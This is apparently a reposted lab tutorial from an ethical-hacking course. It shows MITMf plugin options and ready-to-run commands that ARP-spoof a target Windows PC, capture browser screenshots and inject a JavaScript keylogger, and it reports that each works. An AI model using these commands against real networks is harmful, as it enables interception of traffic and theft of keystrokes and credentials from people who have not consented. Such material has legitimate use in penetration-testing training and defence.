首页 > Web开发 > 详细

Ethical Hacking - NETWORK PENETRATION TESTING(20)

时间:2019-12-14 21:35:52      阅读:86      评论:0      收藏:0      [点我收藏+]

MITM - Capturing Screen Of Target & Injecting a Keylogger

ScreenShotter Plugin:

ScreenShotter:
  Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  --screen              Load plugin ‘ScreenShotter‘
  --interval SECONDS    Interval at which screenshots will be taken (default 10 seconds)

Inject Plugin:

Inject:
  Inject arbitrary content into HTML content

  --inject              Load plugin ‘Inject‘
  --js-url JS_URL       URL of the JS to inject
  --js-payload JS_PAYLOAD
                        JS string to inject
  --js-file JS_FILE     File containing JS to inject
  --html-url HTML_URL   URL of the HTML to inject
  --html-payload HTML_PAYLOAD
                        HTML string to inject
  --html-file HTML_FILE
                        File containing HTML to inject
  --per-domain          Inject once per domain per client.
  --rate-limit RATE_LIMIT
                        Inject once every RATE_LIMIT seconds per client.
  --count-limit COUNT_LIMIT
                        Inject only COUNT_LIMIT times per client.
  --white-ips IP        Inject content ONLY for these ips (comma seperated)
  --black-ips IP        DO NOT inject content for these ips (comma seperated)
  --white-domains DOMAINS
                        Inject content ONLY for these domains (comma seperated)
  --black-domains DOMAINS
                        DO NOT inject content for these domains (comma seperated)

 

Test the ScreenShotter on Victim Windows PC.

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --screen

 

It works perfectly.

技术分享图片

 

 技术分享图片

 

 技术分享图片

 

 

JSKeylogger Plugin:

JSKeylogger:
  Injects a javascript keylogger into clients webpages

  --jskeylogger         Load plugin JSKeylogger

Usage:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.22 -i eth0 --jskeylogger

 

技术分享图片

 

 It works...

技术分享图片

 

 技术分享图片

 

Ethical Hacking - NETWORK PENETRATION TESTING(20)

原文:https://www.cnblogs.com/keepmoving1113/p/12040866.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!